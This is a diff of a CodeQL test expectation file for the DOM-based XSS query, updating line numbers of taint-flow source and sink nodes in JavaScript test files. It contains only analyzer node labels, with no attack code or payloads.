a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

' | semmle.label | '

' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | | nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | | optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | @@ -343,9 +343,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -368,240 +368,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
' | semmle.label | '
' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
" ...
" | semmle.label | "
" ...
" | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
' | semmle.label | '
' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
" ...
" | semmle.label | "
" ...
" | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen 